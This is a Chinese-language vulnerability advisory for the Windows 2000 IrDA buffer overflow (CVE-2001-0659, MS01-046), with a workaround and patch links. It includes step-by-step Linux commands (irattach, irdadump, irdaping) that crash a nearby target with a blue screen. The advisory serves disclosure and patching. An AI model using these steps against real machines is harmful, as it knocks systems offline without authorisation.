发布日期：2001-08-22
更新日期：2001-08-22

受影响系统：

Micorosft Windows 2000

描述：

---

BUGTRAQ  ID: 3215
CVE(CAN) ID: CVE-2001-0659

Microsoft Windows 2000提供了对红外通信的支持。这种支持由IrDA驱动程序来提供。
Windows 2000在处理IrDA设备时存在一个缓冲区溢出漏洞，如果恶意用户构造并发送一个
特定格式的IrDA报文给一台Windows 2000系统，就可能触发一个缓冲区溢出，并导致系统
访问错误。被攻击者的主机表现为蓝屏，并重新启动系统。

由于红外连接的距离有限，因此攻击者不可能远程进行这种攻击。
  
<*来源：Paul Millar (paulm@astro.gla.ac.uk)
        微软安全公告MS01-046:
        http://www.microsoft.com/technet/security/bulletin/MS01-46.asp
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Paul Millar (paulm@astro.gla.ac.uk) 提供了如下测试代码：

  1. 启动便携式电脑，攻击者的主机运行Linux,内核需要支持IrDA
    
  2. 在Linux下安装irda-utils-0.9.10-9
  3. 执行下列命令激活IrDA端口："irattach /dev/ttyS1 -s"
  4. 运行"irdadump"命令确保Linux系统工作正常。输出如下：

     07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)
     07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)
     07:28:17.970845 xid:cmd 4d274896 > ffffffff S=6 s=2 (14)
     07:28:18.060858 xid:cmd 4d274896 > ffffffff S=6 s=3 (14)
     07:28:18.150840 xid:cmd 4d274896 > ffffffff S=6 s=4 (14)
     07:28:18.240861 xid:cmd 4d274896 > ffffffff S=6 s=5 (14)
     07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 [ Computer ] (28)

  5. 将便携式电脑放在与被攻击主机在IrDA有效范围内的位置。
  6. 运行“irdaping".需要提供目的地址，例如上面就应该使用"0x4d274896"
  7. 被攻击的主机会发生蓝屏并自动重启。

建议：

---

临时解决方法：

在设备管理器中禁止IrDA端口。

厂商补丁：

微软已经为此发布了一个安全公告（MS01-046）以及相应补丁程序：
http://www.microsoft.com/technet/security/bulletin/MS01-046.asp

补丁下载：
  
    Microsoft Windows 2000:
    http://www.microsoft.com/windows2000/downloads/critical/q252795/default.asp

浏览次数：3982
严重程度：0（网友投票）